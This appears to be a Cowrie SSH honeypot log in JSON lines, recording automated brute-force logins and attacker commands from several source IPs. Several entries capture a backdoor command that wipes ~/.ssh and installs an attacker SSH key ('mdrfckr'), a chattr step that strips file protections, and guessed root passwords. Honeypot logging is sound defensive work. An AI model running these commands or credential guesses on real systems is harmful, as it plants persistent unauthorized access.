{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T00:29:50.305395Z","src_ip":"43.156.132.147","session":"8ac1d8a78900"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T00:29:50.559427Z","src_ip":"43.156.132.147","session":"8ac1d8a78900"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:29:50.560426Z","src_ip":"43.156.132.147","session":"8ac1d8a78900"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":49804,"dst_ip":"1.2.3.4","dst_port":22,"session":"15570c02e429","protocol":"ssh","message":"New connection: 43.156.132.147:49804 (1.2.3.4:22) [session: 15570c02e429]","sensor":"my-vps","timestamp":"2025-09-09T00:29:50.802366Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:29:50.803034Z","src_ip":"43.156.132.147","session":"15570c02e429"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:29:51.047417Z","src_ip":"43.156.132.147","session":"15570c02e429"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T00:29:52.065994Z","src_ip":"43.156.132.147","session":"15570c02e429"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:29:53.312357Z","src_ip":"43.156.132.147","session":"15570c02e429"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":49812,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad46d8e96897","protocol":"ssh","message":"New connection: 43.156.132.147:49812 (1.2.3.4:22) [session: ad46d8e96897]","sensor":"my-vps","timestamp":"2025-09-09T00:29:53.568331Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:29:53.569344Z","src_ip":"43.156.132.147","session":"ad46d8e96897"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:29:53.835772Z","src_ip":"43.156.132.147","session":"ad46d8e96897"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":42336,"dst_ip":"1.2.3.4","dst_port":22,"session":"6bf6c7acc2bc","protocol":"ssh","message":"New connection: 152.32.129.236:42336 (1.2.3.4:22) [session: 6bf6c7acc2bc]","sensor":"my-vps","timestamp":"2025-09-09T00:29:54.885943Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:29:54.887208Z","src_ip":"152.32.129.236","session":"6bf6c7acc2bc"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:29:54.896414Z","src_ip":"43.156.132.147","session":"ad46d8e96897"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:29:55.142175Z","src_ip":"43.156.132.147","session":"8ac1d8a78900"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:29:55.143020Z","src_ip":"43.156.132.147","session":"ad46d8e96897"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:29:55.148429Z","src_ip":"152.32.129.236","session":"6bf6c7acc2bc"}
{"eventid":"cowrie.login.failed","username":"app","password":"123","message":"login attempt [app/123] failed","sensor":"my-vps","timestamp":"2025-09-09T00:29:56.966295Z","src_ip":"152.32.129.236","session":"6bf6c7acc2bc"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:29:58.229537Z","src_ip":"152.32.129.236","session":"6bf6c7acc2bc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39320,"dst_ip":"1.2.3.4","dst_port":22,"session":"313ffbbeea8d","protocol":"ssh","message":"New connection: 212.227.125.160:39320 (1.2.3.4:22) [session: 313ffbbeea8d]","sensor":"my-vps","timestamp":"2025-09-09T00:30:07.900987Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-09-09T00:30:07.935014Z","src_ip":"212.227.125.160","session":"313ffbbeea8d"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:30:07.936425Z","src_ip":"212.227.125.160","session":"313ffbbeea8d"}
{"eventid":"cowrie.session.closed","duration":31.149689197540283,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:30:08.978232Z","src_ip":"212.227.235.229","session":"4533b83bbdc9"}
{"eventid":"cowrie.session.connect","src_ip":"59.19.131.245","src_port":40092,"dst_ip":"1.2.3.4","dst_port":23,"session":"1d19b1f3f443","protocol":"telnet","message":"New connection: 59.19.131.245:40092 (1.2.3.4:23) [session: 1d19b1f3f443]","sensor":"my-vps","timestamp":"2025-09-09T00:30:13.636757Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59102,"dst_ip":"1.2.3.4","dst_port":22,"session":"a54db34a46f3","protocol":"ssh","message":"New connection: 212.227.235.229:59102 (1.2.3.4:22) [session: a54db34a46f3]","sensor":"my-vps","timestamp":"2025-09-09T00:30:14.839349Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-09-09T00:30:14.840016Z","src_ip":"212.227.235.229","session":"a54db34a46f3"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:30:14.841821Z","src_ip":"212.227.235.229","session":"a54db34a46f3"}
{"eventid":"cowrie.session.connect","src_ip":"51.250.72.176","src_port":37598,"dst_ip":"1.2.3.4","dst_port":22,"session":"15cfd0bdc0c1","protocol":"ssh","message":"New connection: 51.250.72.176:37598 (1.2.3.4:22) [session: 15cfd0bdc0c1]","sensor":"my-vps","timestamp":"2025-09-09T00:30:17.131782Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:30:17.132965Z","src_ip":"51.250.72.176","session":"15cfd0bdc0c1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:30:17.166322Z","src_ip":"51.250.72.176","session":"15cfd0bdc0c1"}
{"eventid":"cowrie.login.failed","username":"test2","password":"123","message":"login attempt [test2/123] failed","sensor":"my-vps","timestamp":"2025-09-09T00:30:17.340200Z","src_ip":"51.250.72.176","session":"15cfd0bdc0c1"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:30:18.375670Z","src_ip":"51.250.72.176","session":"15cfd0bdc0c1"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":43863,"dst_ip":"1.2.3.4","dst_port":22,"session":"9cb3d3fdc9c5","protocol":"ssh","message":"New connection: 103.100.209.195:43863 (1.2.3.4:22) [session: 9cb3d3fdc9c5]","sensor":"my-vps","timestamp":"2025-09-09T00:30:30.170717Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:30:30.178686Z","src_ip":"103.100.209.195","session":"9cb3d3fdc9c5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:30:30.374918Z","src_ip":"103.100.209.195","session":"9cb3d3fdc9c5"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q2w3e4r","message":"login attempt [root/!Q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:30:31.162470Z","src_ip":"103.100.209.195","session":"9cb3d3fdc9c5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:30:31.588553Z","src_ip":"103.100.209.195","session":"9cb3d3fdc9c5"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:30:31.589228Z","src_ip":"103.100.209.195","session":"9cb3d3fdc9c5"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:30:31.590504Z","src_ip":"103.100.209.195","session":"9cb3d3fdc9c5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:30:31.790967Z","src_ip":"103.100.209.195","session":"9cb3d3fdc9c5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:30:32.289720Z","src_ip":"103.100.209.195","session":"9cb3d3fdc9c5"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T00:30:32.290513Z","src_ip":"103.100.209.195","session":"9cb3d3fdc9c5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T00:30:32.493841Z","src_ip":"103.100.209.195","session":"9cb3d3fdc9c5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:30:32.494723Z","src_ip":"103.100.209.195","session":"9cb3d3fdc9c5"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":44350,"dst_ip":"1.2.3.4","dst_port":22,"session":"ebbb5763d31d","protocol":"ssh","message":"New connection: 103.100.209.195:44350 (1.2.3.4:22) [session: ebbb5763d31d]","sensor":"my-vps","timestamp":"2025-09-09T00:30:32.694654Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:30:32.696898Z","src_ip":"103.100.209.195","session":"ebbb5763d31d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:30:32.894649Z","src_ip":"103.100.209.195","session":"ebbb5763d31d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T00:30:33.710045Z","src_ip":"103.100.209.195","session":"ebbb5763d31d"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:30:34.916182Z","src_ip":"103.100.209.195","session":"ebbb5763d31d"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":44920,"dst_ip":"1.2.3.4","dst_port":22,"session":"176a5082d707","protocol":"ssh","message":"New connection: 103.100.209.195:44920 (1.2.3.4:22) [session: 176a5082d707]","sensor":"my-vps","timestamp":"2025-09-09T00:30:35.122066Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:30:35.131449Z","src_ip":"103.100.209.195","session":"176a5082d707"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:30:35.334732Z","src_ip":"103.100.209.195","session":"176a5082d707"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:30:36.153053Z","src_ip":"103.100.209.195","session":"176a5082d707"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:30:36.356594Z","src_ip":"103.100.209.195","session":"9cb3d3fdc9c5"}
